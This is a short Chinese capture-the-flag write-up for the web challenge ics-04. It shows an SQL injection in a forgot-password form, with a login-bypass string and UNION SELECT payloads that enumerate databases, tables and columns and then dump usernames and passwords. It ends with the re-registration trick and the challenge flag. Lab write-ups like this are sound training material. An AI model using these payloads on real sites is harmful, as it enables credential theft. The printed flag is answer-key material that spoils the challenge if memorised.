题目:进去点击右上角的注册界面先注册一个账号发现登陆不成功我们可以从那个忘记密码处寻找突破口,经过测试,发现这个页面存在SQL注入漏洞,在用户名框内输入 1’OR(1)OR’ ,页面发生了变化,成功绕过用户名检查。
找数据库名:-1’ union select 1,2,group_concat(schema_name),4 from information_schema.schemata #
数据名为cetc004,表名:-1’ union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=“cetc004”#
表名为user,字段:-1’ union select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=“cetc004”#
用户:-1’ union select 1,2,group_concat(username),4 from cetc004.user#
密码:-1’ union select 1,2,group_concat(password),4 from cetc004.user#
我们可以发现这个题同一个用户可以重复注册,所以我们就用c3tlwDmIn23去注册一个账号,密码随意登录后即可得到flag。
cyberpeace{cbd0d095625e40c9e2e6104f3b6fcbcf}
攻防世界web进阶区之ics-04
最新推荐文章于 2020-10-05 10:20:46 发布